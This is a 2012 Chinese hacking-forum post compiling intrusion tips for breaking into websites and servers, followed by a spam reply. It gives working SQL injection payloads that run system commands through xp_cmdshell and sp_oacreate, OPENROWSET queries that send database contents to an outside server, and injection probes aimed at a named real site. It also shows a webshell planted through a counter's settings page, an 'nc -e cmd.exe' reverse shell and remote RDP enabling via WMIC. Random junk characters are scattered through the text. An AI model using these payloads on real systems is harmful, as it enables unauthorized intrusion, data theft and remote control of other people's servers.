找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3429|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
% b; z, ?4 c: ~4 X: }
( B3 x8 V) U% k' M, ?8 k* @! U) `: s1 P: I
SA点数据库分离搞法+语句:, o9 P5 D  I4 a! D4 W6 E6 S( ~
$ Z0 F7 T: |5 a* D8 X4 v& ~
注射点不显错,执行下面三条语句页面都返回正常。* a9 x# s: I' _2 a: h3 f
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')0 s' s/ G' x9 n8 R! ^+ h& i
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')# A: B% u0 T- n# Z/ ^- n7 y. r
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
) f5 J: T- {- R! j可以列目录,判断系统为2000,web与数据库分离) B4 d4 O3 ~+ T) [0 A
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。9 s) C3 m  W' O& @, Y4 {4 Y9 ]
在注射点上执行
  q4 D% I5 m5 f" J$ jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
" K& P# R' O1 l- d! h页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
$ Q7 M( z/ [* g- m还有我用NC监听得其他端口都没有得到IP。
2 u& g; }; k: o+ ^( {$ Z
1 g( |' s" ^: p  W( c8 w! |# r通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。1 u2 W5 I- y! t. J' }- Z1 S
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--$ p8 D! X3 J) o) m4 q6 W

  w# r( o( [5 _8 q3 w;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
) F8 c: c% I+ M, f( {9 e& C: F3 v4 F. d9 g; N. S6 c
现在就猜想是不是数据库是内网而且不能连外网。" t" B: j" S  }) z& J/ w+ P( z
# V4 {" ]" y- B- S& M: @4 P
( ]1 ^6 w/ S1 I' T! F0 S
access导出txt文本代码0 A6 _! h) h! \$ ]/ W
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
" g2 {% e# E5 K8 ~* Z2 `  G. ?# ]
$ T% w/ _  {; G( H4 o
" {3 m6 j3 V" P' [) T* J- C7 }+ Q1 ?$ y" B+ q
自动跳转到指定网站代码头
5 a0 x- W" t  Y: C& }9 R* w<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>; q0 e! m7 B$ K6 I" U( J9 C" t
5 Y1 \# R% }# E8 \* A

( {: L$ ]1 C9 B7 G5 R/ C入侵java or jsp站点时默认配置文件路径:) u4 S. G8 ?: y. Q2 u
\web-inf\web.xml# ~0 j2 o, Z, F( K' e, g( J
tomcat下的配置文件位置:
! f" T" Z: ]; @' c- M. s3 O\conf\server.xml            (前面加上tomcat路径): L- x+ J) `' L6 N8 P/ A
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
0 s! B% ]; F  ?9 _& l, N4 h7 d! N
' j9 ?+ ~% g4 b/ R+ Y( q: P: c" h% i: K  o% e% M

1 o- r" t1 ?3 X. n/ I检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
% Q* p+ Y7 [/ t" B-1%23
2 I: l7 ?5 H5 r% S& ]' [: Y( R>
5 t. t# v+ Y9 }# a+ N<
! Q  Z$ j3 A% X5 L, ?. _; `- t1'+or+'1'='1" _. Z, n# Y; q8 e3 _
id=8%bf7 d: G3 Q6 R  @7 x$ M  Q

: X$ Q4 X4 `" O全新注入点检测试法:
9 T' U! H  O8 Z% f/ R3 ?- O9 p在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。! V5 r& R- @- T- }

6 t- _0 W* x% A( s在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。! ~! G( x7 i) m: F
% q& J: U  E# W! `1 T5 f
搜索型注入判断方法:
! V" f) X& q5 x0 U& ]4 v北京%' and '1'='1' and '%'='( I% N" _8 ]5 H2 W6 Z  H( I3 s9 C
北京%' and '1'='2' and '%'='" G1 b" Z6 t& W) n/ o
* w3 V) F% s: c- S5 P
; J4 N3 j, n$ E# m* D# C& g
COOKIES注入:
: A+ G  D$ ]0 I8 W: ], E6 H" d5 D7 b5 D/ x7 I* c+ U
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
6 [" P3 t3 S' b: y2 e, C# P/ a4 z/ y
2000专业版查看本地登录用户命令:; F0 _$ h* e& M" Q, L! t4 m
net config workstation5 H. d6 V/ L7 J5 ?6 R7 ~0 o
6 u+ G- y) m/ ^4 O! `

5 S" z" t3 p: {2003下查看ipsec配置和默认防火墙配置命令:
. f7 B1 X1 q, G+ ], w8 xnetsh firewall show config* F$ F  @9 b8 e) D5 L
netsh ipsec static show all
1 n) W+ }( J; Q, Q6 \9 g, u  c, J# R  `- }/ V% q# }. W0 _
不指派指定策略命令:
. l9 [- g' Y- s/ Hnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
2 a4 V( o4 }# Znetsh ipsec static show policy all  显示策略名
+ t' }1 A* y4 g; Q( r$ Y% ^
% T# p! m" N$ k3 [+ O* @7 b$ Z& E( O  l% k, I
猜管理员后台小技巧:
- k. |7 v% _9 t* W4 Badmin/left.asp 6 X4 V8 o+ P3 d: b3 i1 D' m( P7 W3 f
admin/main.asp1 x$ x3 V3 k1 b& R
admin/top.asp
; J# K3 S" Q/ v" L: ]" R2 Jadmin/admin.asp ( m6 B6 L& i1 J+ \" i- Y
会现出菜单导航,然后迅雷下载全部链接
& o2 D* P* j- l0 R9 {/ K3 q* _
, C6 ~9 B: w: X/ ~3 K
# F/ p" Q/ j' M+ Q& V& z. ]4 \社会工程学:/ P$ o7 f+ S* c' D0 a) w
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
  Y1 H$ U7 k9 I6 a: y6 f8 _然后去骗客服
  T+ _4 b3 {8 e& }) x* o
2 g+ H& i/ O5 c4 L3 y0 E# q( z
7 M2 {; w8 B1 Z& Z" B' e7 i* @统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: ) f# a! ^# A+ y' D: f/ e7 ?  Y
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, " p6 f$ o7 ?; Y+ T
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。7 m# G& }& _+ D; l
2 _+ i$ K7 Q$ ?

) {9 u- H& l' S" d# M  Y! J' H; d
" P4 _8 i7 X& S# w6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)  U' q: _/ N; W+ f

4 E) U* {* ~, A: ~+ D& M; l
% ^6 S+ R9 }+ C# I' s) i! d
+ S0 z+ k0 P" t! c$ j! bCMD加密注册表位置
2 r- f5 m4 p$ H" T; k(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor  i; q# W, z& c& ?1 V; U
AutoRun
% |# y$ J6 G7 ]' r1 S
6 P4 C5 ^9 ?# y) y1 ^0 P" s(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor3 z7 G) [: u! B2 y6 \4 j
AutoRun
$ ?' X. |  a1 l! Q2 U7 o6 Y; l! [+ x; A+ I5 e

1 ^% `& x% d9 o; b在找注入时搜索Hidden,把他改成test. h* q' |9 z7 T3 {* B/ S

+ s6 x; V" ?8 n' H! t
( N/ x0 I$ E8 V9 o4 N( W* b2 c
7 P' L9 {/ P% Z; _mstsc /v:IP /console
, s' n& l8 O1 v% A% d; R- Y  Y, x9 K4 s
& J+ }# v% \" [& S2 q: |
一句话开3389:' f4 N* c5 c5 `: z* m8 T# W
4 W7 \; Z, V* u, s& g
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
0 d  N5 ^- I4 R: b' E. m& e开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
2 v; [4 w$ ~5 K/ n: f" }# S2 }& r8 f7 U/ e. i

* Q4 G6 E, u; k: k知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:) v6 s* S! ?1 Z, |8 M) t5 k, Y9 c' q' l
Insert into admin(user,pwd) values('test','test')4 I" O+ X# }0 `5 X% ~
7 d* I- {1 G% {' d
6 ^3 c6 k6 b& W2 J' t0 c
NC反弹( e5 Z. s+ w* Z) X% J
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   8 z2 r! F+ l% N& Q  e' @2 h$ }
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
1 P3 O3 A! Y2 L% f& p5 t6 ?8 ~3 B6 ~( }7 E
4 D' B7 K+ V2 d2 }8 [& e  Q
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题0 Z7 n/ ~5 ^0 t' L- p
/ e, ?/ z( P" C2 Q- f6 k
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录) B& ~7 B/ E) H3 ]# L1 I8 J: i
例如:; D, J" J. q; C) N6 _0 V/ X: Q
subst k: d:\www\ 用d盘www目录替代k盘/ ?2 s% r2 ~0 t! T+ U0 t4 K
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表